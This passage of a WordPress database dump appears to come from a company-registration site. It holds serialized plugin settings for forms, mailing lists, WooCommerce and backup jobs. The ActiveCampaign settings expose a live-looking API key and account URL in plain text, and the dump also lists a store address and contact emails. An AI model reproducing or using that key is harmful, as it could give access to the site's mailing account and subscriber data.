Date\";s:4:\"type\";s:4:\"text\";s:6:\"hidden\";b:0;}i:33;a:4:{s:8:\"field_id\";s:2:\"33\";s:4:\"name\";s:21:\"Appointment Time From\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:34;a:4:{s:8:\"field_id\";s:2:\"34\";s:4:\"name\";s:19:\"Appointment Time To\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:35;a:4:{s:8:\"field_id\";s:2:\"35\";s:4:\"name\";s:18:\"Payroll Start Date\";s:4:\"type\";s:4:\"text\";s:6:\"hidden\";b:0;}i:36;a:5:{s:8:\"field_id\";s:2:\"36\";s:4:\"name\";s:14:\"Payroll Client\";s:4:\"type\";s:5:\"radio\";s:6:\"hidden\";b:0;s:7:\"options\";a:2:{s:3:\"Yes\";s:3:\"Yes\";s:2:\"No\";s:2:\"No\";}}i:37;a:4:{s:8:\"field_id\";s:2:\"37\";s:4:\"name\";s:27:\"Company 3 Registration Date\";s:4:\"type\";s:4:\"text\";s:6:\"hidden\";b:0;}i:38;a:4:{s:8:\"field_id\";s:2:\"38\";s:4:\"name\";s:27:\"Company 4 Registration Date\";s:4:\"type\";s:4:\"text\";s:6:\"hidden\";b:0;}i:39;a:4:{s:8:\"field_id\";s:2:\"39\";s:4:\"name\";s:9:\"Company 1\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:40;a:4:{s:8:\"field_id\";s:2:\"40\";s:4:\"name\";s:9:\"Company 2\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:41;a:4:{s:8:\"field_id\";s:2:\"41\";s:4:\"name\";s:9:\"Company 3\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:42;a:4:{s:8:\"field_id\";s:2:\"42\";s:4:\"name\";s:9:\"Company 4\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:43;a:4:{s:8:\"field_id\";s:2:\"43\";s:4:\"name\";s:21:\"Our Annual Return Fee\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:44;a:4:{s:8:\"field_id\";s:2:\"44\";s:4:\"name\";s:23:\"Total Annual Return Fee\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:45;a:4:{s:8:\"field_id\";s:2:\"45\";s:4:\"name\";s:29:\" 	Company 5 Registration Date\";s:4:\"type\";s:4:\"text\";s:6:\"hidden\";b:0;}i:46;a:4:{s:8:\"field_id\";s:2:\"46\";s:4:\"name\";s:29:\" 	Company 6 Registration Date\";s:4:\"type\";s:4:\"text\";s:6:\"hidden\";b:0;}i:47;a:4:{s:8:\"field_id\";s:2:\"47\";s:4:\"name\";s:9:\"Company 5\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:48;a:4:{s:8:\"field_id\";s:2:\"48\";s:4:\"name\";s:9:\"Company 6\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:50;a:4:{s:8:\"field_id\";s:2:\"50\";s:4:\"name\";s:27:\"Company 1 Registration Date\";s:4:\"type\";s:4:\"text\";s:6:\"hidden\";b:0;}i:51;a:5:{s:8:\"field_id\";s:2:\"51\";s:4:\"name\";s:28:\"Total Annual Return Fee Paid\";s:4:\"type\";s:5:\"radio\";s:6:\"hidden\";b:0;s:7:\"options\";a:2:{s:3:\"Yes\";s:3:\"Yes\";s:2:\"No\";s:2:\"No\";}}i:52;a:5:{s:8:\"field_id\";s:2:\"52\";s:4:\"name\";s:28:\"CIPC Annual Return Submitted\";s:4:\"type\";s:5:\"radio\";s:6:\"hidden\";b:0;s:7:\"options\";a:2:{s:3:\"Yes\";s:3:\"Yes\";s:2:\"No\";s:2:\"No\";}}i:53;a:4:{s:8:\"field_id\";s:2:\"53\";s:4:\"name\";s:11:\"IRP6 Period\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:54;a:4:{s:8:\"field_id\";s:2:\"54\";s:4:\"name\";s:11:\"IRP6 Amount\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:55;a:4:{s:8:\"field_id\";s:2:\"55\";s:4:\"name\";s:17:\"IRP6 Payment Date\";s:4:\"type\";s:4:\"text\";s:6:\"hidden\";b:0;}i:56;a:4:{s:8:\"field_id\";s:2:\"56\";s:4:\"name\";s:12:\"IRP6 Company\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:57;a:4:{s:8:\"field_id\";s:2:\"57\";s:4:\"name\";s:28:\"Monthly Information Required\";s:4:\"type\";s:8:\"textarea\";s:6:\"hidden\";b:0;}}}s:25:\"maw.digitalstrategies.biz\";a:4:{s:5:\"lists\";a:5:{i:2;a:3:{s:4:\"name\";s:17:\"CoReg Entry Popup\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}i:3;a:3:{s:4:\"name\";s:9:\"MAW Leads\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}i:4;a:3:{s:4:\"name\";s:4:\"Main\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}i:5;a:3:{s:4:\"name\";s:47:\"CoReg + Adwords + R299 company reg + free ebook\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}i:6;a:3:{s:4:\"name\";s:23:\"CoReg+Adwords+FreeEbook\";s:17:\"subscribers_count\";s:1:\"1\";s:11:\"growth_week\";s:1:\"0\";}}s:7:\"api_key\";s:72:\"fa7ad7dcbed82fe83b8fce10f709a8fc689038443742c59d62477758f318f46adc70dc88\";s:7:\"api_url\";s:26:\"https://maw831.api-us1.com\";s:13:\"is_authorized\";s:4:\"true\";}}}}','yes'),(274083,'et_bloom_stats_optin_cache','a:0:{}','yes'),(280080,'et_pb_cache_notice','a:1:{s:6:\"3.27.3\";s:6:\"ignore\";}','yes'),(280527,'woocommerce_shipping_debug_mode','no','no'),(282220,'woocommerce_activecampaign_settings','a:11:{s:7:\"enabled\";s:3:\"yes\";s:18:\"activecampaign_url\";s:26:\"https://maw831.api-us1.com\";s:18:\"activecampaign_key\";s:72:\"fa7ad7dcbed82fe83b8fce10f709a8fc689038443742c59d62477758f318f46adc70dc88\";s:6:\"occurs\";s:7:\"pending\";s:4:\"list\";s:5:\"es|11\";s:14:\"display_opt_in\";s:2:\"no\";s:12:\"opt_in_label\";s:0:\"\";s:22:\"tag_purchased_products\";s:3:\"yes\";s:28:\"purchased_product_tag_prefix\";s:0:\"\";s:11:\"contact_tag\";s:18:\"CoReg Site Contact\";s:25:\"purchased_product_tag_add\";s:14:\"\"#SKU#, #CAT#\"\";}','yes'),(282339,'widget_vfb_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(282351,'wd_form_maker_version','1.11.6','no'),(282352,'fm_settings','a:4:{s:10:\"public_key\";s:0:\"\";s:11:\"private_key\";s:0:\"\";s:13:\"csv_delimiter\";s:1:\",\";s:7:\"map_key\";s:0:\"\";}','yes'),(282353,'widget_form_maker_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(282354,'fm_emailverification','1','yes'),(282355,'fm_admin_notice','a:1:{s:15:\"two_week_review\";a:3:{s:5:\"start\";s:10:\"10/30/2017\";s:3:\"int\";i:14;s:9:\"dismissed\";i:1;}}','yes'),(282356,'fm_subscribe_done','1','yes'),(282365,'CF593d53e794a4c','a:21:{s:13:\"_last_updated\";s:31:\"Sat, 17 Jun 2017 11:00:24 +0000\";s:2:\"ID\";s:15:\"CF593d53e794a4c\";s:10:\"cf_version\";s:5:\"1.5.1\";s:4:\"name\";s:34:\"Standard Company Registration Form\";s:10:\"scroll_top\";i:0;s:11:\"description\";s:14:\"														\";s:7:\"success\";s:54:\"Form has been successfully submitted. Thank you.						\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";N;s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:2:{s:11:\"fld_8931537\";s:3:\"1:1\";s:11:\"fld_6929219\";s:3:\"2:1\";}s:9:\"structure\";s:5:\"12|12\";}s:6:\"fields\";a:2:{s:11:\"fld_8931537\";a:8:{s:2:\"ID\";s:11:\"fld_8931537\";s:4:\"type\";s:11:\"date_picker\";s:5:\"label\";s:18:\"Insert Todays Date\";s:4:\"slug\";s:18:\"insert_todays_date\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:8:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"format\";s:10:\"yyyy-mm-dd\";s:9:\"autoclose\";i:1;s:10:\"start_view\";s:5:\"month\";s:10:\"start_date\";i:0;s:8:\"end_date\";s:0:\"\";s:8:\"language\";s:5:\"en-GB\";}}s:11:\"fld_6929219\";a:8:{s:2:\"ID\";s:11:\"fld_6929219\";s:4:\"type\";s:8:\"dropdown\";s:5:\"label\";s:41:\"How many directors will the company have?\";s:4:\"slug\";s:40:\"how_many_directors_will_the_company_have\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:30:\"Select the number of directors\";s:6:\"config\";a:12:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:14:\"default_option\";s:0:\"\";s:9:\"auto_type\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:9:\"post_type\";s:4:\"post\";s:11:\"value_field\";s:4:\"name\";s:11:\"orderby_tax\";s:5:\"count\";s:12:\"orderby_post\";s:2:\"ID\";s:5:\"order\";s:3:\"ASC\";s:7:\"default\";s:0:\"\";s:6:\"option\";a:4:{s:9:\"opt205872\";a:3:{s:10:\"calc_value\";s:3:\"One\";s:5:\"value\";s:3:\"One\";s:5:\"label\";s:3:\"One\";}s:10:\"opt1319999\";a:3:{s:10:\"calc_value\";s:3:\"Two\";s:5:\"value\";s:3:\"Two\";s:5:\"label\";s:3:\"Two\";}s:10:\"opt2187849\";a:3:{s:10:\"calc_value\";s:5:\"Three\";s:5:\"value\";s:5:\"Three\";s:5:\"label\";s:5:\"Three\";}s:10:\"opt3344595\";a:3:{s:10:\"calc_value\";s:4:\"Four\";s:5:\"value\";s:4:\"Four\";s:5:\"label\";s:4:\"Four\";}}}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"info@companyregistration.online\";s:8:\"reply_to\";s:0:\"\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:0:\"\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:34:\"Standard Company Registration Form\";s:13:\"email_message\";s:9:\"{summary}\";}s:18:\"conditional_groups\";a:0:{}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:7:\"version\";s:5:\"1.5.1\";}','yes'),(282485,'et_google_api_settings','a:3:{s:7:\"api_key\";s:0:\"\";s:26:\"enqueue_google_maps_script\";s:2:\"on\";s:16:\"use_google_fonts\";s:2:\"on\";}','yes'),(284223,'_caldera_forms_email_api_settings','a:4:{s:8:\"sendgrid\";a:1:{s:3:\"key\";s:0:\"\";}s:2:\"wp\";a:0:{}s:6:\"method\";s:2:\"wp\";s:7:\"caldera\";N;}','yes'),(287975,'et_core_version','3.27.3','yes'),(287981,'woocommerce_enable_reviews','yes','yes'),(287986,'woocommerce_helper_data','a:1:{s:11:\"did-migrate\";b:1;}','yes'),(292461,'su_presets_slider','a:1:{s:9:\"last_used\";a:3:{s:2:\"id\";s:9:\"last_used\";s:4:\"name\";s:18:\"Last used settings\";s:8:\"settings\";a:16:{s:6:\"source\";s:13:\"category: 111\";s:5:\"limit\";s:1:\"5\";s:4:\"link\";s:4:\"none\";s:6:\"target\";s:4:\"self\";s:5:\"width\";s:3:\"200\";s:6:\"height\";s:3:\"300\";s:10:\"responsive\";s:3:\"yes\";s:5:\"title\";s:3:\"yes\";s:8:\"centered\";s:3:\"yes\";s:6:\"arrows\";s:3:\"yes\";s:5:\"pages\";s:3:\"yes\";s:10:\"mousewheel\";s:3:\"yes\";s:8:\"autoplay\";s:4:\"5000\";s:5:\"speed\";s:3:\"600\";s:5:\"class\";s:0:\"\";s:7:\"content\";s:5:\"false\";}}}','yes'),(304772,'ossdl_off_blog_url','https://companyregistration.online','yes'),(304780,'seed_csp4_review','a:2:{s:4:\"time\";i:1505125186;s:9:\"dismissed\";b:1;}','yes'),(304795,'_cf_clippy_first','1503844097','no'),(315674,'custom_product_tabs_onesixone_data_update','1','yes'),(315682,'woocommerce_store_address','101 Rose Avenue','yes'),(315683,'woocommerce_store_address_2','Lenasia','yes'),(315684,'woocommerce_store_city','Johannesburg','yes'),(315685,'woocommerce_store_postcode','1827','yes'),(315712,'su_option_dismissed_notices','a:1:{s:4:\"rate\";b:1;}','yes'),(318111,'wpsc_feed_list','a:0:{}','yes'),(322749,'bewpi_install_date','2017-11-13 16:01:29','no'),(322756,'bewpi_version','3.0.7','no'),(322899,'wcj_free_price_enabled','no','yes'),(322900,'wcj_products_per_page_enabled','no','yes'),(322901,'wcj_stock_enabled','no','yes'),(322902,'wcj_product_bulk_meta_editor_enabled','no','yes'),(322903,'wcj_product_bookings_enabled','no','yes'),(322904,'wcj_product_addons_enabled','no','yes'),(322905,'wcj_product_open_pricing_enabled','no','yes'),(322906,'wcj_offer_price_enabled','no','yes'),(322907,'wcj_price_by_user_role_enabled','no','yes'),(322908,'wcj_global_discount_enabled','no','yes'),(322909,'wcj_product_price_by_formula_enabled','no','yes'),(322910,'wcj_product_by_country_enabled','no','yes'),(322911,'wcj_product_by_time_enabled','no','yes'),(322912,'wcj_product_by_date_enabled','no','yes'),(322913,'wcj_product_by_user_role_enabled','no','yes'),(322914,'wcj_product_by_user_enabled','no','yes'),(322915,'wcj_cart_customization_enabled','no','yes'),(322916,'wcj_checkout_customization_enabled','no','yes'),(322917,'wcj_payment_gateways_by_currency_enabled','no','yes'),(322918,'wcj_payment_gateways_by_user_role_enabled','no','yes'),(322919,'wcj_payment_gateways_by_shipping_enabled','no','yes'),(322920,'wcj_shipping_options_enabled','no','yes'),(322921,'wcj_left_to_free_shipping_enabled','no','yes'),(322922,'wcj_shipping_by_user_role_enabled','no','yes'),(322923,'wcj_shipping_by_products_enabled','no','yes'),(322924,'wcj_shipping_by_order_amount_enabled','no','yes'),(322925,'wcj_order_min_amount_enabled','no','yes'),(322926,'wcj_order_quantities_enabled','no','yes'),(322927,'wcj_email_options_enabled','no','yes'),(322928,'wcj_emails_verification_enabled','no','yes'),(322929,'wcj_multicurrency_base_price_enabled','no','yes'),(322930,'wcj_currency_per_product_enabled','no','yes'),(322931,'wcj_price_formats_enabled','no','yes'),(322932,'wcj_track_users_enabled','no','yes'),(322933,'wcj_breadcrumbs_enabled','no','yes'),(322934,'wcj_url_coupons_enabled','no','yes'),(322935,'wcj_admin_bar_enabled','no','yes'),(322936,'wcj_my_account_enabled','no','yes'),(322937,'wcj_custom_css_enabled','no','yes'),(322938,'wcj_custom_js_enabled','no','yes'),(322939,'wcj_products_xml_enabled','no','yes'),(322940,'wcj_export_enabled','no','yes'),(322941,'booster_for_woocommerce_version','3.2.2','yes'),(322946,'widget_wcj_widget_country_switcher','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(322947,'widget_wcj_widget_selector','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(322949,'wcj_download_tcpdf_fonts_hook_timestamp','1511125553','yes'),(322950,'wcj_invoicing_fonts_version_timestamp','1511125553','yes'),(322951,'wcj_invoicing_fonts_version','2.9.0','yes'),(322959,'buwd_version','1.0.16','no'),(322960,'buwd_hash','3dd56e','no'),(322961,'buwd_settings','a:14:{s:11:\"show_on_bar\";a:1:{i:0;s:1:\"1\";}s:10:\"log_folder\";s:44:\"wp-content/uploads/backup-wd-logs-{hash_key}\";s:12:\"job_step_max\";i:3;s:11:\"auth_method\";s:4:\"none\";s:13:\"max_exec_time\";i:300;s:13:\"job_start_key\";s:7:\"0eb6add\";s:15:\"red_server_load\";s:8:\"disabled\";s:13:\"max_log_files\";i:15;s:9:\"log_level\";s:17:\"normal_translated\";s:8:\"hash_key\";s:6:\"3dd56e\";s:9:\"recipient\";s:31:\"info@companyregistration.online\";s:10:\"email_from\";s:31:\"info@companyregistration.online\";s:4:\"from\";s:26:\"companyregistration.online\";s:7:\"subject\";s:10:\"Backup log\";}','no'),(322962,'buwd_jobs','a:6:{i:1;a:94:{s:4:\"name\";s:15:\"Database Backup\";s:4:\"type\";a:2:{i:0;s:2:\"db\";i:1;s:5:\"files\";}s:11:\"destination\";a:1:{i:0;s:6:\"folder\";}s:11:\"backup_type\";s:7:\"archive\";s:12:\"archive_name\";s:37:\"backupwd_{hash_key}_%Y-%m-%d_%H-%i-%s\";s:14:\"archive_format\";s:3:\"tar\";s:8:\"schedule\";s:8:\"manually\";s:12:\"scheduletype\";s:5:\"basic\";s:13:\"schedulemonth\";a:13:{i:0;s:3:\"any\";i:1;s:1:\"1\";i:2;s:1:\"2\";i:3;s:1:\"3\";i:4;s:1:\"4\";i:5;s:1:\"5\";i:6;s:1:\"6\";i:7;s:1:\"7\";i:8;s:1:\"8\";i:9;s:1:\"9\";i:10;s:2:\"10\";i:11;s:2:\"11\";i:12;s:2:\"12\";}s:12:\"scheduleweek\";a:1:{i:0;s:1:\"1\";}s:12:\"dbtables_all\";a:0:{}s:8:\"dbtables\";a:56:{s:18:\"wp_cf_form_entries\";s:18:\"wp_cf_form_entries\";s:21:\"wp_cf_form_entry_meta\";s:21:\"wp_cf_form_entry_meta\";s:23:\"wp_cf_form_entry_values\";s:23:\"wp_cf_form_entry_values\";s:11:\"wp_cf_forms\";s:11:\"wp_cf_forms\";s:14:\"wp_cf_tracking\";s:14:\"wp_cf_tracking\";s:19:\"wp_cf_tracking_meta\";s:19:\"wp_cf_tracking_meta\";s:14:\"wp_commentmeta\";s:14:\"wp_commentmeta\";s:11:\"wp_comments\";s:11:\"wp_comments\";s:22:\"wp_duplicator_packages\";s:22:\"wp_duplicator_packages\";s:17:\"wp_et_bloom_stats\";s:17:\"wp_et_bloom_stats\";s:29:\"wp_et_divi_ab_testing_clients\";s:29:\"wp_et_divi_ab_testing_clients\";s:27:\"wp_et_divi_ab_testing_stats\";s:27:\"wp_et_divi_ab_testing_stats\";s:12:\"wp_formmaker\";s:12:\"wp_formmaker\";s:19:\"wp_formmaker_backup\";s:19:\"wp_formmaker_backup\";s:20:\"wp_formmaker_blocked\";s:20:\"wp_formmaker_blocked\";s:28:\"wp_formmaker_display_options\";s:28:\"wp_formmaker_display_options\";s:18:\"wp_formmaker_query\";s:18:\"wp_formmaker_query\";s:21:\"wp_formmaker_sessions\";s:21:\"wp_formmaker_sessions\";s:20:\"wp_formmaker_submits\";s:20:\"wp_formmaker_submits\";s:19:\"wp_formmaker_themes\";s:19:\"wp_formmaker_themes\";s:18:\"wp_formmaker_views\";s:18:\"wp_formmaker_views\";s:8:\"wp_links\";s:8:\"wp_links\";s:25:\"wp_nextend2_image_storage\";s:25:\"wp_nextend2_image_storage\";s:27:\"wp_nextend2_section_storage\";s:27:\"wp_nextend2_section_storage\";s:35:\"wp_nextend2_smartslider3_generators\";s:35:\"wp_nextend2_smartslider3_generators\";s:32:\"wp_nextend2_smartslider3_sliders\";s:32:\"wp_nextend2_smartslider3_sliders\";s:37:\"wp_nextend2_smartslider3_sliders_xref\";s:37:\"wp_nextend2_smartslider3_sliders_xref\";s:31:\"wp_nextend2_smartslider3_slides\";s:31:\"wp_nextend2_smartslider3_slides\";s:10:\"wp_options\";s:10:\"wp_options\";s:11:\"wp_postmeta\";s:11:\"wp_postmeta\";s:8:\"wp_posts\";s:8:\"wp_posts\";s:21:\"wp_term_relationships\";s:21:\"wp_term_relationships\";s:16:\"wp_term_taxonomy\";s:16:\"wp_term_taxonomy\";s:11:\"wp_termmeta\";s:11:\"wp_termmeta\";s:8:\"wp_terms\";s:8:\"wp_terms\";s:15:\"wp_ufbl_entries\";s:15:\"wp_ufbl_entries\";s:13:\"wp_ufbl_forms\";s:13:\"wp_ufbl_forms\";s:11:\"wp_usermeta\";s:11:\"wp_usermeta\";s:8:\"wp_users\";s:8:\"wp_users\";s:23:\"wp_woocommerce_api_keys\";s:23:\"wp_woocommerce_api_keys\";s:35:\"wp_woocommerce_attribute_taxonomies\";s:35:\"wp_woocommerce_attribute_taxonomies\";s:47:\"wp_woocommerce_downloadable_product_permissions\";s:47:\"wp_woocommerce_downloadable_product_permissions\";s:18:\"wp_woocommerce_log\";s:18:\"wp_woocommerce_log\";s:29:\"wp_woocommerce_order_itemmeta\";s:29:\"wp_woocommerce_order_itemmeta\";s:26:\"wp_woocommerce_order_items\";s:26:\"wp_woocommerce_order_items\";s:32:\"wp_woocommerce_payment_tokenmeta\";s:32:\"wp_woocommerce_payment_tokenmeta\";s:29:\"wp_woocommerce_payment_tokens\";s:29:\"wp_woocommerce_payment_tokens\";s:23:\"wp_woocommerce_sessions\";s:23:\"wp_woocommerce_sessions\";s:38:\"wp_woocommerce_shipping_zone_locations\";s:38:\"wp_woocommerce_shipping_zone_locations\";s:36:\"wp_woocommerce_shipping_zone_methods\";s:36:\"wp_woocommerce_shipping_zone_methods\";s:29:\"wp_woocommerce_shipping_zones\";s:29:\"wp_woocommerce_shipping_zones\";s:33:\"wp_woocommerce_tax_rate_locations\";s:33:\"wp_woocommerce_tax_rate_locations\";s:24:\"wp_woocommerce_tax_rates\";s:24:\"wp_woocommerce_tax_rates\";s:24:\"wp_wr_contactform_fields\";s:24:\"wp_wr_contactform_fields\";s:28:\"wp_wr_contactform_form_pages\";s:28:\"wp_wr_contactform_form_pages\";s:33:\"wp_wr_contactform_submission_data\";s:33:\"wp_wr_contactform_submission_data\";}s:10:\"dbfilename\";s:12:\"smepubli_wp4\";s:17:\"use_wp_connection\";s:1:\"1\";s:10:\"dbfilecomp\";s:4:\"none\";s:7:\"db_host\";s:0:\"\";s:7:\"db_user\";s:0:\"\";s:11:\"db_password\";s:0:\"\";s:7:\"db_name\";s:0:\"\";s:8:\"bup_root\";s:0:\"\";s:11:\"bup_content\";s:0:\"\";s:19:\"bup_content_exclude\";s:0:\"\";s:11:\"bup_plugins\";s:1:\"1\";s:19:\"bup_plugins_exclude\";a:1:{i:0;s:9:\"backup-wd\";}s:10:\"bup_themes\";s:1:\"1\";s:11:\"bup_uploads\";s:1:\"1\";s:17:\"bup_extra_folders\";s:0:\"\";s:19:\"bup_uploads_exclude\";a:3:{i:0;s:21:\"backup-wd-logs-3dd56e\";i:1;s:21:\"backup-wd-temp-3dd56e\";i:2;s:16:\"backup-wd-3dd56e\";}s:20:\"bup_include_specials\";s:1:\"1\";s:13:\"exclude_types\";s:51:\".tmp,.svn,.git,desktop.ini,.DS_Store,/node_modules/\";s:16:\"use_folder_as_wp\";s:1:\"0\";s:10:\"folderpath\";s:43:\"wp-content/uploads/backup-wd-db-{hash_key}/\";s:12:\"folderdelete\";i:15;s:16:\"folderdeletesync\";s:1:\"1\";s:12:\"gdrivefolder\";s:27:\"companyregistration.online/\";s:16:\"gdrivefiledelete\";i:15;s:20:\"gdrivefiledeletesync\";s:1:\"1\";s:9:\"s3service\";s:9:\"us-east-1\";s:11:\"s3accesskey\";s:0:\"\";s:12:\"s3privatekey\";s:0:\"\";s:8:\"s3bucket\";s:0:\"\";s:11:\"s3newbucket\";s:0:\"\";s:14:\"s3bucketfolder\";s:27:\"companyregistration.online/\";s:12:\"s3filedelete\";i:15;s:16:\"s3filedeletesync\";s:1:\"1\";s:13:\"s3multiupload\";s:1:\"1\";s:14:\"s3storageclass\";s:8:\"standard\";s:18:\"s3serverencryption\";s:1:\"1\";s:9:\"dboxtoken\";s:0:\"\";s:8:\"dboxtype\";s:7:\"sandbox\";s:10:\"dboxfolder\";s:27:\"companyregistration.online/\";s:14:\"dboxfiledelete\";i:15;s:18:\"dboxfiledeletesync\";s:1:\"1\";s:9:\"azurename\";s:0:\"\";s:8:\"azurekey\";s:0:\"\";s:12:\"azurenewcont\";s:0:\"\";s:11:\"azurefolder\";s:27:\"companyregistration.online/\";s:15:\"azurefiledelete\";i:15;s:19:\"azurefiledeletesync\";s:1:\"1\";s:7:\"rscuser\";s:0:\"\";s:6:\"rsckey\";s:0:\"\";s:9:\"rscregion\";s:3:\"DFW\";s:12:\"rsccontainer\";s:0:\"\";s:10:\"rscnewcont\";s:0:\"\";s:9:\"rscfolder\";s:27:\"companyregistration.online/\";s:13:\"rscfiledelete\";i:15;s:17:\"rscfiledeletesync\";s:1:\"1\";s:9:\"ftpserver\";s:0:\"\";s:7:\"ftpport\";i:21;s:7:\"ftpuser\";s:0:\"\";s:7:\"ftppass\";s:0:\"\";s:9:\"ftpfolder\";s:27:\"companyregistration.online/\";s:13:\"ftpfiledelete\";i:15;s:10:\"ftptimeout\";i:90;s:6:\"ftpssl\";s:0:\"\";s:8:\"ftppmode\";s:1:\"1\";s:10:\"sugartoken\";s:0:\"\";s:9:\"sugaruser\";s:0:\"\";s:15:\"sugarsyncfolder\";s:0:\"\";s:11:\"sugarfolder\";s:27:\"companyregistration.online/\";s:15:\"sugarfiledelete\";i:15;s:14:\"glacier_region\";s:9:\"us-east-1\";s:17:\"glacier_accesskey\";s:0:\"\";s:18:\"glacier_privatekey\";s:0:\"\";s:16:\"glacier_newvault\";s:0:\"\";s:18:\"glacier_filedelete\";i:15;s:10:\"send_email\";s:0:\"\";s:6:\"job_id\";i:1;s:15:\"cron_expression\";s:9:\"0 0 * * *\";s:12:\"schedulelink\";s:104:\"https://companyregistration.online/wp-cron.php?jobid=1&amp;buwd_cron=1&amp;type=run&amp;_wpnonce=0eb6add\";s:3:\"day\";s:0:\"\";s:11:\"scheduleday\";s:0:\"\";s:12:\"schedulehour\";s:2:\"00\";s:14:\"scheduleminute\";s:2:\"00\";}i:2;a:94:{s:4:\"name\";s:12:\"Files Backup\";s:4:\"type\";a:1:{i:0;s:5:\"files\";}s:11:\"destination\";a:1:{i:0;s:6:\"folder\";}s:11:\"backup_type\";s:7:\"archive\";s:12:\"archive_name\";s:37:\"backupwd_{hash_key}_%Y-%m-%d_%H-%i-%s\";s:14:\"archive_format\";s:3:\"tar\";s:8:\"schedule\";s:8:\"manually\";s:12:\"scheduletype\";s:5:\"basic\";s:13:\"schedulemonth\";a:13:{i:0;s:3:\"any\";i:1;s:1:\"1\";i:2;s:1:\"2\";i:3;s:1:\"3\";i:4;s:1:\"4\";i:5;s:1:\"5\";i:6;s:1:\"6\";i:7;s:1:\"7\";i:8;s:1:\"8\";i:9;s:1:\"9\";i:10;s:2:\"10\";i:11;s:2:\"11\";i:12;s:2:\"12\";}s:12:\"scheduleweek\";a:1:{i:0;s:1:\"1\";}s:12:\"dbtables_all\";a:0:{}s:8:\"dbtables\";a:56:{s:18:\"wp_cf_form_entries\";s:18:\"wp_cf_form_entries\";s:21:\"wp_cf_form_entry_meta\";s:21:\"wp_cf_form_entry_meta\";s:23:\"wp_cf_form_entry_values\";s:23:\"wp_cf_form_entry_values\";s:11:\"wp_cf_forms\";s:11:\"wp_cf_forms\";s:14:\"wp_cf_tracking\";s:14:\"wp_cf_tracking\";s:19:\"wp_cf_tracking_meta\";s:19:\"wp_cf_tracking_meta\";s:14:\"wp_commentmeta\";s:14:\"wp_commentmeta\";s:11:\"wp_comments\";s:11:\"wp_comments\";s:22:\"wp_duplicator_packages\";s:22:\"wp_duplicator_packages\";s:17:\"wp_et_bloom_stats\";s:17:\"wp_et_bloom_stats\";s:29:\"wp_et_divi_ab_testing_clients\";s:29:\"wp_et_divi_ab_testing_clients\";s:27:\"wp_et_divi_ab_testing_stats\";s:27:\"wp_et_divi_ab_testing_stats\";s:12:\"wp_formmaker\";s:12:\"wp_formmaker\";s:19:\"wp_formmaker_backup\";s:19:\"wp_formmaker_backup\";s:20:\"wp_formmaker_blocked\";s:20:\"wp_formmaker_blocked\";s:28:\"wp_formmaker_display_options\";s:28:\"wp_formmaker_display_options\";s:18:\"wp_formmaker_query\";s:18:\"wp_formmaker_query\";s:21:\"wp_formmaker_sessions\";s:21:\"wp_formmaker_sessions\";s:20:\"wp_formmaker_submits\";s:20:\"wp_formmaker_submits\";s:19:\"wp_formmaker_themes\";s:19:\"wp_formmaker_themes\";s:18:\"wp_formmaker_views\";s:18:\"wp_formmaker_views\";s:8:\"wp_links\";s:8:\"wp_links\";s:25:\"wp_nextend2_image_storage\";s:25:\"wp_nextend2_image_storage\";s:27:\"wp_nextend2_section_storage\";s:27:\"wp_nextend2_section_storage\";s:35:\"wp_nextend2_smartslider3_generators\";s:35:\"wp_nextend2_smartslider3_generators\";s:32:\"wp_nextend2_smartslider3_sliders\";s:32:\"wp_nextend2_smartslider3_sliders\";s:37:\"wp_nextend2_smartslider3_sliders_xref\";s:37:\"wp_nextend2_smartslider3_sliders_xref\";s:31:\"wp_nextend2_smartslider3_slides\";s:31:\"wp_nextend2_smartslider3_slides\";s:10:\"wp_options\";s:10:\"wp_options\";s:11:\"wp_postmeta\";s:11:\"wp_postmeta\";s:8:\"wp_posts\";s:8:\"wp_posts\";s:21:\"wp_term_relationships\";s:21:\"wp_term_relationships\";s:16:\"wp_term_taxonomy\";s:16:\"wp_term_taxonomy\";s:11:\"wp_termmeta\";s:11:\"wp_termmeta\";s:8:\"wp_terms\";s:8:\"wp_terms\";s:15:\"wp_uf